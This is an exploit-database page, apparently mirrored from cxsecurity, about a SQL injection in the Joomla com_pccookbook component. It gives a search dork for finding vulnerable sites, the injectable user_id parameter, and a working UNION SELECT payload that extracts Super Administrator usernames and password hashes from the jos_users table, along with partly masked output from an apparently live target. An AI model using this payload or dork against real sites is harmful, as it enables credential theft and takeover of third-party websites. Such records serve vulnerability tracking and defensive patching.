Joomla com_pccookbook Components Sql Injection vulnerability

2013.08.29
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################# # Iranian Exploit DataBase # Www.iedb.Ir # www.iedb.ir/acc ################################# # Exploit Title : joomla com_pccookbook Components Sql Injection vulnerability # Author : Iranian Exploit DataBase # Discovered By : IeDb # Home : http://Www.iedb.Ir - www.iedb.ir/acc # Software Link : http://www.joomla.org # Security Risk : High # Tested on : Linux # Dork : inurl:index.php?option=com_pccookbook ################################# Exploit : # http://www.Site.com/index.php?option=com_pccookbook&page=viewuserrecipes&user_id=[Sql] # Dem0 : # http://www.XXXX.com/bp/index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999+UNION+SELECT+concat%280x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e%29+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- # Recipes of user: Xang:8XXc2XXXXXXX :Super Administrator ################################# # Exploit Archive : http://iedb.ir/exploits-110.html #################################

References:

http://iedb.ir/exploits-110.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top